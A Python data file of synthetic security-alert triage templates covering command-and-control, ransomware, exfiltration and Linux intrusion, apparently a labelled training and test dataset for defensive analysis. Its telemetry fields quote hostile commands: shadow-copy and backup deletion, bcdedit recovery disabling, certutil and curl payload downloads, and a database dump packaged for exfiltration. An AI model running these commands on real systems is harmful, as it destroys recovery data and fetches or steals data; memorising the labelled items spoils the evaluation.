# -*- coding: utf-8 -*-
"""Specs Chunk 3: Domains 9 to 12 (TF-061 to TF-085) - 25 templates"""

CHUNK_3 = [
    # --- DOMAIN 9: Network C2 & Tunneling (7) ---
    ("TF-061", "Microsoft Update CDN Proxy Traffic", "network_c2", "alert_triage", "benign", "train", None, "Windows", "workstation", "employee01",
     "Outbound HTTPS Traffic to Microsoft Windows Update CDN", "informational", "Proxy CDN Traffic",
     [("proxy_log", "Workstation connected to windowsupdate.microsoft.com over TLS on port 443", '{"url": "https://windowsupdate.microsoft.com", "port": 443, "status": 200}'),
      ("network_connection", "TCP socket established to verified Akamai Microsoft CDN IP 203.0.113.10", '{"dest_ip": "203.0.113.10", "asn": "Microsoft Corporation"}')],
     [("Corporate endpoint fetched signed operating system updates via official Microsoft CDN endpoints.", ["EVT-001", "EVT-002"], "informational")],
     "Legitimate automated operating system patch check conforming to network baseline.", [],
     [("Close alert as benign operating system update communication.", "low", "Expected infrastructure traffic.")], None),

    ("TF-062", "High Frequency DNS Queries to Newly Registered Domain", "network_c2", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "workstation", "intern01",
     "Anomalous DNS Volume to Young Domain Registration", "medium", "DNS Domain Age Anomaly",
     [("dns_query", "Host sent 45 DNS lookups within 2 minutes for newly registered domain {domain}", '{"domain": "{domain}", "query_count": 45}'),
      ("threat_intel_match", "Domain whois record indicates registration 48 hours prior", '{"domain": "{domain}", "age_days": 2}')],
     [("Repetitive DNS resolution requests targeting domain registered less than 48 hours prior.", ["EVT-001", "EVT-002"], "medium")],
     "Newly registered domains with high query frequency often indicate initial staging or dynamic DNS beaconing.",
     [("T1071.004", "DNS", "Command and Control", ["EVT-001"])],
     [("Sinkhole domain {domain} internally and inspect originating process on host {hostname}.", "medium", "Block potential C2 resolution.")], None),

    ("TF-063", "DNS Tunneling Base32 Queries", "network_c2", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee05",
     "DNS Tunneling Encoded Subdomain Query Pattern Detected", "high", "DNS Tunneling Detection",
     [("dns_query", "Series of 80 unique high-entropy base32 subdomain queries targeting c2-tunnel.biz", '{"query_sample": "a8f3b9c1d4e7.c2-tunnel.biz", "record_type": "TXT", "entropy": 4.8}'),
      ("network_connection", "Outbound UDP port 53 traffic to external non-corporate resolver 198.51.100.15", '{"dest_ip": "198.51.100.15", "port": 53}')],
     [("High entropy TXT query sequence exhibiting characteristic signature of DNS data encapsulation and tunneling.", ["EVT-001", "EVT-002"], "high")],
     "DNS protocol abuse to bypass web proxies and establish covert command or exfiltration channel.",
     [("T1071.004", "DNS", "Command and Control", ["EVT-001", "EVT-002"])],
     [("Block external DNS resolver 198.51.100.15 and isolate endpoint {hostname}.", "immediate", "Sever DNS tunnel.")], None),

    ("TF-064", "Cobalt Strike HTTPS Beaconing Pattern", "network_c2", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin01",
     "Periodic Jittered HTTPS Beaconing Matching Cobalt Strike Profile", "critical", "C2 Beacon Detection",
     [("network_connection", "Regular outbound HTTPS POST requests occurring every 60s (+/- 10% jitter) to {ext_ip}", '{"dest_ip": "{ext_ip}", "port": 443, "interval_sec": 60, "jitter": 0.1}'),
      ("proxy_log", "URI pattern matches Cobalt Strike default malleable C2 profile /submit.php?id=", '{"uri": "/submit.php?id=9412", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}'),
      ("threat_intel_match", "Destination IP {ext_ip} flagged in threat feed as active Cobalt Strike team server", '{"indicator": "{ext_ip}", "threat": "CobaltStrike C2"}')],
     [("Persistent periodic network beaconing exhibiting malleable C2 profile timing characteristics.", ["EVT-001", "EVT-002"], "critical"),
      ("Threat intelligence corroboration confirms destination host as active adversary infrastructure.", ["EVT-003"], "critical")],
     "Confirmed command-and-control channel active on critical server node.",
     [("T1071.001", "Web Protocols", "Command and Control", ["EVT-001", "EVT-002", "EVT-003"])],
     [("Sever network connection to {ext_ip} at perimeter firewall immediately.", "immediate", "Stop beaconing."),
      ("Perform emergency memory capture on server {hostname} to locate injected beacon payload.", "immediate", "Recover implant.")], None),

    ("TF-065", "Proxy User-Agent Alert Missing Destination IP", "network_c2", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Windows", "workstation", "employee01",
     "Anomalous Proxy User-Agent String Logged with Truncated IP", "low", "Proxy Telemetry Incomplete",
     [("proxy_log", "Outbound web request with anomalous user-agent 'Mozilla/4.0 (compatible)' recorded by edge proxy", '{"user_agent": "Mozilla/4.0 (compatible)", "dest_host": "unknown"}'),
      ("authentication", "User employee01 authenticated to proxy within same minute", '{"user": "employee01"}')],
     [("Anomalous legacy User-Agent string detected, but upstream proxy failure lost destination IP and URL.", ["EVT-001", "EVT-002"], "low")],
     "Anomalous User-Agent could represent custom C2 or legacy software check, but missing destination leaves assessment inconclusive.", [],
     [("Correlate workstation local web browser cache and netstat connection history for timestamp window.", "medium", "Identify remote endpoint.")],
     ["Workstation Netstat history", "Edge firewall state table logs"]),

    ("TF-066", "Ingress Tool Transfer via Certutil from Pastebin", "network_c2", "alert_triage", "likely_malicious", "val", None, "Windows", "workstation", "intern01",
     "Certutil Invoked to Retrieve Content from Raw Pastebin", "high", "Certutil Web Ingress",
     [("process_creation", "certutil.exe executed with -urlcache -split -f to raw.pastebin.com/raw/7bXa1", '{"command_line": "certutil.exe -urlcache -split -f https://raw.pastebin.com/raw/7bXa1 C:\\\\Temp\\\\run.ps1"}'),
      ("network_connection", "certutil.exe fetched 12 KB payload from public paste service", '{"dest": "raw.pastebin.com", "port": 443}'),
      ("file_modification", "Downloaded script run.ps1 written to C:\\Temp", '{"file": "C:\\\\Temp\\\\run.ps1"}')],
     [("Living-off-the-land utility certutil used to pull external script from public paste site.", ["EVT-001", "EVT-002"], "high"),
      ("Script file run.ps1 deposited into temporary directory.", ["EVT-003"], "high")],
     "Use of certutil to bypass proxies and download code from public paste repositories is a high-confidence threat pattern.",
     [("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-001", "EVT-002"]),
      ("T1071.001", "Web Protocols", "Command and Control", ["EVT-002"])],
     [("Quarantine file C:\\Temp\\run.ps1 and block pastebin download URL.", "immediate", "Prevent script execution.")], None),

    ("TF-067", "Tor Exit Node Connection Blocked Host Offline", "network_c2", "alert_triage", "insufficient_evidence", "test", None, "Windows", "workstation", "employee02",
     "Firewall Dropped Connection to Tor Exit Node but Host Offline", "medium", "Tor Traffic Intercepted",
     [("firewall_log", "Edge firewall dropped TCP SYN to known Tor exit node 185.220.101.33:9001 from 10.0.1.42", '{"dest_ip": "185.220.101.33", "dest_port": 9001, "action": "DROP"}'),
      ("vulnerability_scan", "Host 10.0.1.42 went offline immediately following firewall drop event", '{"status": "HOST_UNREACHABLE"}')],
     [("Attempted connection to anonymizing Tor network blocked at perimeter, but endpoint was powered down before EDR query.", ["EVT-001", "EVT-002"], "medium")],
     "Connection to Tor indicates potential dark web C2 or unauthorized bypass, but unreachable endpoint prevents process attribution.", [],
     [("Place physical hold on workstation 10.0.1.42 and prevent reconnection to corporate LAN.", "high", "Quarantine hardware.")],
     ["Endpoint physical disk artifact", "DHCP lease history for 10.0.1.42"]),

    # --- DOMAIN 10: Impact & Ransomware (6) ---
    ("TF-068", "7-Zip Authorized Backup Compression", "impact_ransomware", "evidence_analysis", "benign", "val", None, "Windows", "server", "it_admin01",
     "High Volume Archive Creation by IT Administrator", "low", "Mass Compression Utility",
     [("process_creation", "7z.exe executed with a -tzip parameter compressing quarterly database dumps", '{"command_line": "7z.exe a -tzip E:\\\\Backups\\\\Q4_DB.zip D:\\\\Dumps\\\\*.sql"}'),
      ("file_modification", "Large archive file Q4_DB.zip created on designated storage volume", '{"path": "E:\\\\Backups\\\\Q4_DB.zip", "size": 128912401}')],
     [("IT administrator compressed database archives into designated storage volume using standard utility.", ["EVT-001", "EVT-002"], "low")],
     "Legitimate data archiving activity performed by authorized personnel using standard tools.", [],
     [("Close alert as benign administrative file archiving.", "low", "Expected operational procedure.")], None),

    ("TF-069", "Mass File Renaming Spike to .tmp Without Note", "impact_ransomware", "alert_triage", "suspicious", "train", "suspicious_vs_likely_malicious", "Windows", "workstation", "employee05",
     "Rapid Renaming of 80 User Documents in Desktop Directory", "medium", "File Renaming Anomaly",
     [("file_modification", "80 office documents in C:\\Users\\employee05\\Documents renamed with .tmp extension", '{"renamed_count": 80, "extension": ".tmp"}'),
      ("process_creation", "excel.exe running multiple instances under user session", '{"process": "excel.exe", "instances": 3}')],
     [("High volume of user documents renamed in rapid succession, but no ransom note or encryption header detected.", ["EVT-001", "EVT-002"], "medium")],
     "Rapid file extension alteration could indicate broken macro script or early ransomware staging; requires manual inspection.",
     [("T1486", "Data Encrypted for Impact", "Impact", ["EVT-001"])],
     [("Check modified files for presence of encryption signatures or ransom note text.", "high", "Verify file state.")], None),

    ("TF-070", "Volume Shadow Copy Deletion via Vssadmin", "impact_ransomware", "alert_triage", "likely_malicious", "train", "likely_malicious_vs_confirmed_malicious", "Windows", "server", "employee01",
     "Vssadmin Invoked to Purge All Volume Shadow Copies", "high", "Shadow Copy Deletion",
     [("process_creation", "vssadmin.exe delete shadows /all /quiet executed from cmd.exe", '{"command_line": "vssadmin.exe delete shadows /all /quiet"}'),
      ("process_creation", "wmic.exe shadowcopy delete executed immediately following vssadmin", '{"command_line": "wmic.exe shadowcopy delete"}')],
     [("Explicit automated deletion of all volume shadow copies to prevent system recovery.", ["EVT-001", "EVT-002"], "high")],
     "Inhibiting system recovery by wiping shadow copies is a hallmark precursor to enterprise ransomware deployment.",
     [("T1490", "Inhibit System Recovery", "Impact", ["EVT-001", "EVT-002"])],
     [("Immediately isolate server {hostname} from network to prevent encryption payload launch.", "immediate", "Preempt ransomware impact."),
      ("Alert SOC oncall engineer of imminent ransomware deployment on server {hostname}.", "immediate", "Declare incident.")], None),

    ("TF-071", "Ransomware Spree with HOW_TO_DECRYPT Note", "impact_ransomware", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "contractor01",
     "Mass Encryption of File Shares with Ransomware Note Dropped", "critical", "Ransomware Deployment",
     [("file_modification", "1,200 files on shared drive encrypted with extension .locked within 45 seconds", '{"files_encrypted": 1200, "extension": ".locked"}'),
      ("file_modification", "Ransom note file HOW_TO_DECRYPT_FILES.txt dropped into all affected directories", '{"note_file": "HOW_TO_DECRYPT_FILES.txt"}'),
      ("process_creation", "vssadmin.exe delete shadows /all /quiet executed concurrently", '{"cmd": "vssadmin.exe delete shadows /all /quiet"}')],
     [("Active enterprise ransomware outbreak: over 1,000 files encrypted across corporate share.", ["EVT-001"], "critical"),
      ("Ransom note deployed across directories and shadow copies purged to prevent restoration.", ["EVT-002", "EVT-003"], "critical")],
     "Confirmed active ransomware detonation impacting critical file storage infrastructure.",
     [("T1486", "Data Encrypted for Impact", "Impact", ["EVT-001", "EVT-002"]),
      ("T1490", "Inhibit System Recovery", "Impact", ["EVT-003"])],
     [("Trigger emergency containment: sever storage network links and shutdown affected server.", "immediate", "Halt encryption spread."),
      ("Prepare offline disaster recovery backups for restore operations.", "immediate", "Initiate DR recovery.")], None),

    ("TF-072", "File Integrity Monitor Storage Crash During Spike", "impact_ransomware", "alert_triage", "insufficient_evidence", "train", "likely_malicious_vs_insufficient_evidence", "Windows", "server", "SYSTEM",
     "File Integrity Spike on Storage Array Followed by Controller Crash", "high", "Storage Telemetry Interrupted",
     [("file_modification", "File Integrity Monitor registered 500 file modifications across share in 10 seconds", '{"mod_count": 500, "rate_per_sec": 50}'),
      ("firewall_log", "SAN storage controller crashed and disconnected from network during event", '{"status": "SAN_CONTROLLER_OFFLINE"}')],
     [("Mass file alteration detected, but catastrophic SAN controller outage interrupted telemetry before file contents could be inspected.", ["EVT-001", "EVT-002"], "high")],
     "Spike matches ransomware encryption burst, but cannot distinguish from storage controller corruption or firmware bug without controller logs.", [],
     [("Boot storage array in safe maintenance mode and extract non-volatile controller memory logs.", "immediate", "Inspect file headers.")],
     ["SAN Storage Controller dump", "Offline disk sector read"]),

    ("TF-073", "Bcdedit Recovery Disabled and SafeBoot Alteration", "impact_ransomware", "alert_triage", "confirmed_malicious", "val", None, "Windows", "workstation", "employee02",
     "Bcdedit Executed to Inhibit System Recovery and Ignore Failures", "critical", "Boot Recovery Invalidation",
     [("process_creation", "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", '{"command_line": "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"}'),
      ("process_creation", "bcdedit.exe /set {default} recoveryenabled no", '{"command_line": "bcdedit.exe /set {default} recoveryenabled no"}'),
      ("process_creation", "wbadmin.exe delete catalog -quiet", '{"command_line": "wbadmin.exe delete catalog -quiet"}')],
     [("Adversary modified Windows Boot Configuration Data to disable automatic startup repair.", ["EVT-001", "EVT-002"], "high"),
      ("Backup catalog purged to prevent system state rollback.", ["EVT-003"], "critical")],
     "Explicit, deliberate destruction of Windows operating system recovery mechanisms prior to system destruction or ransomware deployment.",
     [("T1490", "Inhibit System Recovery", "Impact", ["EVT-001", "EVT-002", "EVT-003"])],
     [("Force immediate power cutoff to endpoint {hostname} to prevent disk encryption payload.", "immediate", "Preempt final payload phase.")], None),

    # --- DOMAIN 11: Data Exfiltration (5) ---
    ("TF-074", "Corporate OneDrive Sync of Office Documents", "data_exfiltration", "evidence_analysis", "benign", "test", None, "Windows", "workstation", "employee01",
     "High Volume Data Upload to Corporate OneDrive Tenant", "informational", "OneDrive Cloud Sync",
     [("network_connection", "OneDrive.exe uploaded 450 MB over TLS to verified corporate tenant endpoint", '{"dest_host": "company-my.sharepoint.com", "port": 443, "bytes_out": 471859200}'),
      ("authentication", "Single Sign-On authentication verified against Azure AD corporate tenant", '{"tenant_id": "corp-tenant-uuid", "status": "SUCCESS"}')],
     [("Standard corporate cloud storage synchronization client synced project files to authorized company tenant.", ["EVT-001", "EVT-002"], "informational")],
     "Approved corporate cloud synchronization to internal company OneDrive repository.", [],
     [("Close alert as benign authorized cloud storage sync.", "low", "Standard cloud operations.")], None),

    ("TF-075", "Large Upload to Personal Cloud Storage Service", "data_exfiltration", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Windows", "workstation", "employee05",
     "Outbound Transfer of 2.1 GB to Personal Dropbox Account", "medium", "Cloud Storage Transfer Anomaly",
     [("proxy_log", "Workstation transferred 2.1 GB to personal storage URL dropbox.com/upload", '{"domain": "dropbox.com", "bytes_out": 2254857830}'),
      ("file_modification", "User employee05 copied 14 design archive files from network share to local Desktop prior to upload", '{"source": "\\\\\\\\SRV-FILE-01\\\\Projects", "count": 14}')],
     [("Employee transferred large volume of corporate project files to personal unapproved cloud storage account.", ["EVT-001", "EVT-002"], "medium")],
     "Policy violation regarding unapproved cloud services; potential insider risk or unauthorized data exfiltration.",
     [("T1567.002", "Exfiltration to Cloud Storage", "Exfiltration", ["EVT-001", "EVT-002"])],
     [("Interview user employee05 and review transferred file list with Department head.", "medium", "Assess insider risk.")], None),

    ("TF-076", "Data Exfiltration over Port 8080 Unencrypted", "data_exfiltration", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "deployer",
     "Outbound Archive Transfer Over Non-Standard HTTP Port", "high", "Unencrypted Protocol Exfiltration",
     [("network_connection", "Process python3 initiated outbound TCP socket to {ext_ip}:8080 transmitting 85 MB", '{"dest_ip": "{ext_ip}", "dest_port": 8080, "bytes_out": 89128960}'),
      ("file_modification", "Compressed archive db_export.tar.gz created in /tmp immediately before transmission", '{"path": "/tmp/db_export.tar.gz"}')],
     [("Sensitive compressed archive generated and transmitted to untrusted external IP over unencrypted alternative port.", ["EVT-001", "EVT-002"], "high")],
     "Exfiltration of archive over non-standard unencrypted port to unapproved external destination.",
     [("T1048.003", "Exfiltration Over Unencrypted Non-C2 Protocol", "Exfiltration", ["EVT-001", "EVT-002"]),
      ("T1059.006", "Python", "Execution", ["EVT-001"])],
     [("Block destination IP {ext_ip} at perimeter and inspect contents of /tmp/db_export.tar.gz.", "immediate", "Mitigate data loss.")], None),

    ("TF-077", "Staged Sensitive Database Dumps Uploaded to Mega", "data_exfiltration", "alert_triage", "confirmed_malicious", "train", None, "Windows", "server", "admin02",
     "Confidential Customer Database Dump Uploaded to Mega.nz", "critical", "Active Data Theft",
     [("process_creation", "mysqldump.exe executed to dump corporate customer financial table", '{"command_line": "mysqldump.exe -u root --all-databases > C:\\\\Temp\\\\customers_full.sql"}'),
      ("process_creation", "7z.exe encrypted customer dump with strong password", '{"command_line": "7z.exe a -pSecurePass123 C:\\\\Temp\\\\exfil.7z C:\\\\Temp\\\\customers_full.sql"}'),
      ("network_connection", "MEGAsync client uploaded exfil.7z to Mega cloud storage endpoint {ext_ip}:443", '{"dest_ip": "{ext_ip}", "port": 443, "bytes": 450192800}')],
     [("Adversary dumped complete database, packaged it into password-protected archive, and transmitted to anonymous cloud storage.", ["EVT-001", "EVT-002", "EVT-003"], "critical")],
     "Confirmed high-severity data theft involving customer financial database exfiltration to cloud storage provider.",
     [("T1567.002", "Exfiltration to Cloud Storage", "Exfiltration", ["EVT-003"]),
      ("T1078.002", "Domain Accounts", "Defense Evasion", ["EVT-001"])],
     [("Block Mega.nz domain and IP addresses across enterprise network.", "immediate", "Halt outbound upload."),
      ("Trigger corporate data breach response notification protocols.", "immediate", "Legal compliance.")], None),

    ("TF-078", "NetFlow High Bandwidth Truncated Record", "data_exfiltration", "investigation_planning", "insufficient_evidence", "val", "suspicious_vs_insufficient_evidence", "Windows", "server", "SYSTEM",
     "NetFlow Anomaly Alert with Incomplete Packet Accounting", "low", "NetFlow Telemetry Gap",
     [("network_connection", "NetFlow sensor registered sudden 1.2 GB outbound burst from database server", '{"source_ip": "172.16.0.10", "bytes_out": 1288490188}'),
      ("firewall_log", "NetFlow collector dropped flow record before remote destination IP was finalized", '{"dest_ip": null, "collector_status": "BUFFER_OVERFLOW"}')],
     [("NetFlow flow record indicated high volume outbound egress, but collector buffer overflow lost destination host.", ["EVT-001", "EVT-002"], "low")],
     "Large egress volume warrants concern, but missing destination prevents identifying whether it was scheduled off-site backup or exfiltration.", [],
     [("Examine switch port egress counters and query database server active socket history.", "medium", "Trace network destination.")],
     ["Switch interface packet counters", "Database server TCP connection state table"]),

    # --- DOMAIN 12: Linux Endpoint & Server Telemetry (7) ---
    ("TF-079", "Linux Apt Package Upgrade", "linux_telemetry", "evidence_analysis", "benign", "test", None, "Linux", "server", "root",
     "Standard Security Package Upgrade via Apt", "informational", "Linux System Package Update",
     [("process_creation", "apt-get upgrade -y executed by root during designated server maintenance window", '{"command_line": "/usr/bin/apt-get upgrade -y"}'),
      ("file_modification", "Package cache and binary libraries updated in /usr/lib/ and /var/cache/apt/", '{"path": "/var/cache/apt/archives/", "packages_updated": 12}')],
     [("System administrator performed routine operating system security patch installation using native package manager.", ["EVT-001", "EVT-002"], "informational")],
     "Documented maintenance activity conforming to standard Linux system patching lifecycle.", [],
     [("Close alert as verified routine Linux package maintenance.", "low", "Expected server maintenance.")], None),

    ("TF-080", "SSH Login from Unusual Geolocation", "linux_telemetry", "alert_triage", "suspicious", "train", "benign_vs_suspicious", "Linux", "server", "deployer",
     "SSH Authentication to Production Server from Residential IP", "medium", "SSH Geolocation Anomaly",
     [("authentication", "Successful SSH publickey authentication for deployer from external IP {ext_ip}", '{"user": "deployer", "source_ip": "{ext_ip}", "auth_method": "publickey"}'),
      ("network_connection", "Inbound SSH connection established on port 22", '{"dest_port": 22, "source_ip": "{ext_ip}"}')],
     [("Valid SSH public key utilized from unexpected external residential IP address.", ["EVT-001", "EVT-002"], "medium")],
     "Valid key authentication from unusual geolocation warrants confirmation with developer regarding remote work.",
     [("T1078", "Valid Accounts", "Defense Evasion", ["EVT-001"])],
     [("Contact user deployer to verify whether remote connection from {ext_ip} was authorized.", "medium", "Confirm legitimate travel/remote work.")], None),

    ("TF-081", "Apache Web Shell Upload c99.php", "linux_telemetry", "alert_triage", "likely_malicious", "train", "suspicious_vs_likely_malicious", "Linux", "server", "www-data",
     "PHP Web Shell Dropped into Public Web Server Directory", "high", "Web Shell Deployment",
     [("file_modification", "New PHP script c99.php written to /var/www/html/uploads/ by www-data", '{"path": "/var/www/html/uploads/c99.php", "size": 18410}'),
      ("process_creation", "Apache spawned /bin/sh running curl -s http://{domain}/payload.elf -o /tmp/payload.elf", '{"parent": "apache2", "command_line": "/bin/sh -c curl -s http://{domain}/payload.elf -o /tmp/payload.elf && chmod +x /tmp/payload.elf"}'),
      ("network_connection", "curl process established outbound socket to {ext_ip}:80", '{"dest_ip": "{ext_ip}", "port": 80}')],
     [("Arbitrary file upload vulnerability abused to drop PHP web shell in public uploads directory.", ["EVT-001"], "high"),
      ("Web server executed curl to download secondary executable stage from untrusted domain {domain}.", ["EVT-002", "EVT-003"], "high")],
     "Web application exploitation leading to file upload and automated curl payload retrieval under web server identity.",
     [("T1059.006", "Python", "Execution", ["EVT-002"]),
      ("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-002", "EVT-003"]),
      ("T1082", "System Information Discovery", "Discovery", ["EVT-001"])],
     [("Delete web shell /var/www/html/uploads/c99.php immediately and restart web service.", "immediate", "Eradicate web shell."),
      ("Patch file upload endpoint in web application code to enforce filetype validation.", "high", "Remediate vulnerability.")], None),

    ("TF-082", "SSH Brute Force Followed by Sudo Escalation", "linux_telemetry", "alert_triage", "confirmed_malicious", "train", None, "Linux", "server", "ubuntu",
     "Automated SSH Brute Force Leading to Root Privilege Escalation", "critical", "Brute Force and Privilege Escalation",
     [("authentication", "140 failed SSH logon attempts recorded within 3 minutes from external IP {ext_ip}", '{"failed_count": 140, "source_ip": "{ext_ip}"}'),
      ("authentication", "Successful SSH password authentication for account ubuntu from {ext_ip}", '{"user": "ubuntu", "source_ip": "{ext_ip}", "status": "SUCCESS"}'),
      ("process_creation", "User ubuntu executed 'sudo su -' to obtain interactive root shell", '{"user": "ubuntu", "command_line": "sudo su -"}')],
     [("High volume automated dictionary attack succeeded in compromising default account password.", ["EVT-001", "EVT-002"], "high"),
      ("Attacker immediately escalated privileges to root using password sudo access.", ["EVT-003"], "critical")],
     "Complete server takeover: brute-force password discovery followed immediately by root shell acquisition.",
     [("T1110.001", "Password Guessing", "Credential Access", ["EVT-001"]),
      ("T1078", "Valid Accounts", "Defense Evasion", ["EVT-002"])],
     [("Terminate all active SSH sessions and ban source IP {ext_ip} in fail2ban/iptables.", "immediate", "Eject attacker."),
      ("Disable password authentication in sshd_config and enforce publickey-only access.", "immediate", "Halt future brute force.")], None),

    ("TF-083", "UFW Firewall Deny Spike Missing Process Telemetry", "linux_telemetry", "investigation_planning", "insufficient_evidence", "train", "suspicious_vs_insufficient_evidence", "Linux", "server", "root",
     "Perimeter Firewall Dropping Outbound Traffic Without Host Context", "low", "UFW Drop Anomaly",
     [("firewall_log", "UFW firewall logged 120 dropped outbound packets targeting external port 4444", '{"action": "UFW BLOCK", "dest_port": 4444, "count": 120}'),
      ("network_connection", "Host auditd recorded network socket attempt but calling PID was recycled", '{"protocol": "TCP", "pid": null}')],
     [("Firewall successfully prevented outbound communication on common reverse shell port, but calling process terminated before attribution.", ["EVT-001", "EVT-002"], "low")],
     "Outbound connection attempt to port 4444 is suspicious, but blocked status and recycled PID leave originating application unknown.", [],
     [("Deploy active auditd rule monitoring connect() syscalls to capture future socket invocations.", "medium", "Capture calling binary.")],
     ["Auditd syscall connect trace log", "Netfilter connection tracking table"]),

    ("TF-084", "Curl Download to /tmp on Staging Server", "linux_telemetry", "alert_triage", "suspicious", "val", "benign_vs_suspicious", "Linux", "server", "deployer",
     "Curl Downloading Shell Script to Linux Temporary Directory", "medium", "Curl Ingress Script",
     [("process_creation", "curl -s http://10.0.2.10/setup_test.sh -o /tmp/setup_test.sh executed by deployer", '{"command_line": "curl -s http://10.0.2.10/setup_test.sh -o /tmp/setup_test.sh"}'),
      ("file_modification", "Shell script setup_test.sh created with executable permissions in /tmp", '{"path": "/tmp/setup_test.sh", "permissions": "rwxr-xr-x"}')],
     [("Automated ingress file transfer utility curl retrieved shell script directly into world-writeable directory.", ["EVT-001", "EVT-002"], "medium")],
     "Downloading shell scripts directly to /tmp is common in developer testing but mimics dropper staging tactics.",
     [("T1105", "Ingress Tool Transfer", "Command and Control", ["EVT-001", "EVT-002"])],
     [("Review script /tmp/setup_test.sh to verify whether developer testing was authorized.", "medium", "Audit downloaded shell code.")], None),

    ("TF-085", "Linux Daemon Crash Missing Core Dump", "linux_telemetry", "investigation_planning", "insufficient_evidence", "test", None, "Linux", "server", "root",
     "System Daemon Terminated with SIGSEGV Without Core Dump Artifact", "low", "Daemon Crash Anomaly",
     [("process_creation", "System daemon nginx terminated with exit code 139 (SIGSEGV)", '{"daemon": "nginx", "signal": "SIGSEGV", "exit_code": 139}'),
      ("file_modification", "System systemd-coredump disabled via ulimit, no core artifact saved", '{"core_dump_saved": false}')],
     [("Production web daemon crashed due to segmentation fault, but disabled core dumps prevent memory analysis.", ["EVT-001", "EVT-002"], "low")],
     "Segmentation faults can indicate buffer overflow exploitation or routine software bug; absent memory dump prevents verification.", [],
     [("Enable temporary core dumps for nginx daemon and inspect syslog for memory offset registers.", "medium", "Capture future crash dumps.")],
     ["Linux dmesg kernel ring buffer", "Nginx error.log preceding crash"])
]

print(f"Chunk 3 loaded: {len(CHUNK_3)} templates.")
